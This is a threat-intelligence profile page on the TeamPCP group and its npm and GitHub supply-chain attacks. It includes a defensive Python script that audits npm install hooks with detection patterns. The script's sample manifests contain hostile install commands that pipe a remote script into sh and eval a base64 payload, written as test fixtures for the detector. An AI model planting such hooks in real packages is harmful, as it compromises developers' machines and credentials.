TeamPCP

Also known as ResoluteXBF, Replicating Marauder, UNC6780, Shellforce, PersyPCP, pcpcats, SHADOW-WATER-058, @pcpcats, Mini Shai-Hulud, xploitrsturtle2, PCPCat
Reports: 42
First seen: Mar 26
Last seen: Jun 18
Motivation: financial, financial extortion, notoriety, disruption, chaos

Targeting

Sectors
technology ×23
other ×2
financial services ×1
Victim regions
United States ×14
Brazil ×1

Top ATT&CK techniques

T1195 Supply Chain Compromise ×28
T1041 Exfiltration Over C2 Channel ×25
T1555 Credentials from Password Stores ×23
T1005 Data from Local System ×19
T1078 Valid Accounts ×17
T1003 OS Credential Dumping ×10
T1204 User Execution ×9
T1566 Phishing ×9
T1190 Exploit Public-Facing Application ×8
T1547 Boot or Logon Autostart Execution ×7
T1486 Data Encrypted for Impact ×7
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage ×6
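The technique counts above are dominated by supply-chain compromise through package registries, followed by credential theft from the installing machine and exfiltration. The practical check that follows from that profile is to know which of your npm dependencies run code at install time at all, since a package that has been republished with a malicious version needs nothing more than a preinstall or postinstall hook to execute before any of its code is imported. The script below is an added example, not code from this page or from any of the reports it lists: it audits a dependency tree for install-time lifecycle hooks and tags commands that match a few heuristics. The hook names are npm's; the regex heuristics, the package names and the manifests are constructed for illustration and are not indicators from this page.

```python
"""Audit an npm dependency tree for install-time lifecycle scripts.

Added example: not code from the source page or the reports it lists.
npm runs the preinstall/install/postinstall scripts declared in a package's
package.json during `npm install`, so a compromised package version can run
arbitrary commands on the installing machine before it is ever imported.
This script lists every such hook in a tree and tags commands that match a
few heuristics (hypothetical patterns for illustration, not indicators).
"""
import json
import re
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic patterns; deliberately coarse. A hit means "look at this",
# not "this package is compromised".
SUSPICIOUS_PATTERNS = [
    ("remote-fetch", re.compile(r"\b(curl|wget)\b")),
    ("inline-eval", re.compile(r"\beval\(|\bnew Function\(")),
    ("encoded-payload", re.compile(r"base64|fromCharCode|\\x[0-9a-f]{2}", re.I)),
    ("shell-exec", re.compile(r"\|\s*(ba)?sh\b|\bchild_process\b")),
]


def audit_manifest(name: str, manifest: dict) -> list[dict]:
    """Return one finding per install-time hook defined in a package.json."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        tags = [tag for tag, rx in SUSPICIOUS_PATTERNS if rx.search(command)]
        findings.append({"package": name, "version": manifest.get("version", "?"),
                         "hook": hook, "command": command, "tags": tags})
    return findings


def audit_tree(manifests: dict[str, str]) -> list[dict]:
    """Audit a mapping of package name -> raw package.json text.

    Findings with at least one tag sort first, then alphabetically by package.
    """
    findings = []
    for name, raw in manifests.items():
        findings.extend(audit_manifest(name, json.loads(raw)))
    return sorted(findings, key=lambda f: (not f["tags"], f["package"]))


def load_node_modules(root: Path) -> dict[str, str]:
    """Read every installed package.json under a node_modules directory.

    Scoped packages live one level deeper, as @scope/name/package.json.
    """
    manifests = {}
    for manifest in list(root.glob("*/package.json")) + list(root.glob("@*/*/package.json")):
        manifests[str(manifest.parent.relative_to(root))] = manifest.read_text()
    return manifests


# Constructed sample tree standing in for node_modules/*/package.json.
# Package names, versions and commands are made up for this example.
SAMPLE_MANIFESTS = {
    "native-widget": json.dumps({"version": "2.1.0",
                                 "scripts": {"postinstall": "node-gyp rebuild"}}),
    "plain-lib": json.dumps({"version": "1.0.0", "scripts": {"test": "jest"}}),
    "fetch-helper": json.dumps({"version": "0.3.1", "scripts": {
        "postinstall": "curl -fsSL https://example.invalid/setup.sh | sh"}}),
    "tainted-util": json.dumps({"version": "4.2.1", "scripts": {
        "preinstall": "node -e \"eval(Buffer.from('aGk=','base64').toString())\""}}),
}


if __name__ == "__main__":
    # Replace SAMPLE_MANIFESTS with load_node_modules(Path("node_modules"))
    # to audit a real installation.
    for f in audit_tree(SAMPLE_MANIFESTS):
        flag = ",".join(f["tags"]) or "-"
        print(f"{f['package']}@{f['version']} {f['hook']}: [{flag}] {f['command']}")
```

A build step such as `node-gyp rebuild` is a legitimate reason for a postinstall hook, which is why the script reports every hook rather than only tagged ones: the useful signal is a hook appearing in a package that did not have one in the previous version, so diff the output across lockfile updates rather than reading it once. `npm install --ignore-scripts` prevents the hooks from running at all while you review them.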

Indicators

cve ×128
domain ×41
filename ×36
ip_v4 ×24
hash_sha1 ×13
url ×5
hash_sha256 ×5
email ×2


Associated CVEs

Recent reports

[High] Intelligence Insights: June 2026 – ClearFake, Kali365, and TeamPCP Lead Threat Rankings (Red Canary)
[Critical] TeamPCP's supply-chain attack spree: 1,000+ compromised packages in four months (CyberScoop)
[Critical] GitHub dismissed security reports on flaws exploited by Shai-Hulud supply-chain worm (The Record, Recorded Future News)
[High] Microsoft Restores GitHub Repos as Miasma Supply Chain Campaign Continues (The Hacker News)
[Critical] Miasma Worm Compromises 73 Microsoft GitHub Repositories in Supply Chain Attack (The Hacker News)
[Critical] IronWorm and Miasma Worm Variant Hit npm in Supply Chain Attacks (The Hacker News)
[High] New IronWorm malware hits 36 packages in npm supply-chain attack (Bleeping Computer)
[High] CERT-EU Cyber Brief May 2026 – Espionage, Supply-Chain Attacks, and Ransomware Infrastructure Disruption (CERT-EU Threat Intel)
[High] Red Hat removes tainted packages after software pipeline compromise (The Record, Recorded Future News)
[High] Red Hat npm packages compromised in supply-chain attack distributing Miasma credential stealer (Bleeping Computer)
[Info] Container security: attack vectors from escapes to supply chain compromise (Kaspersky Securelist)
[Critical] Malicious Sicoob NuGet and npm Packages Steal Banking Credentials and Cloud Secrets (The Hacker News)
[High] TeamPCP stole GitHub's internal repos (Risky Business)
[Critical] Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos (The Hacker News)
[Critical] Megalodon GitHub Attack Compromises 5,561 Repos with Malicious CI/CD Workflows (The Hacker News)
[Critical] GitHub breach linked to malicious Nx Console VS Code extension in TanStack supply-chain attack (Bleeping Computer)
[High] GitHub Internal Repositories Breached via Compromised Nx Console VS Code Extension (The Hacker News)
[High] Grafana breach caused by missed token rotation after TanStack attack (Bleeping Computer)
[High] GitHub internal repositories exfiltrated via poisoned VS Code extension (CyberScoop)
[High] GitHub confirms breach by TeamPCP via poisoned VS Code extension (The Record, Recorded Future News)
[Critical] GitHub Breached via Poisoned VS Code Extension; TeamPCP Exfiltrates 3,800+ Internal Repos (The Hacker News)
[High] GitHub confirms breach of 3,800 repos via malicious VSCode extension (Bleeping Computer)
[High] Grafana GitHub Breach Exposes Source Code via TanStack npm Supply Chain Attack (The Hacker News)
[High] GitHub investigates internal repositories breach claimed by TeamPCP (Bleeping Computer)
[High] GitHub internal repositories breached via malicious VS Code extension (Sophos News)
[Critical] Mini Shai-Hulud malware resurgence compromises hundreds of npm packages (CyberScoop)
[Critical] Mini Shai-Hulud Supply Chain Attack Compromises 323 npm Packages via TeamPCP (The Hacker News)
[High] Weekly Threat Recap: Exchange 0-Day, npm Supply Chain Attacks, Cisco Exploits (The Hacker News)
[High] TanStack Supply Chain Attack Impacts OpenAI Employee Devices; TeamPCP Campaign Expands (The Hacker News)
[High] ThreatsDay Bulletin: PAN-OS RCE, Mythos cURL Bug, AI Tokenizer Attacks, and 10+ Stories (The Hacker News)

This page shows data on a 7-day delay.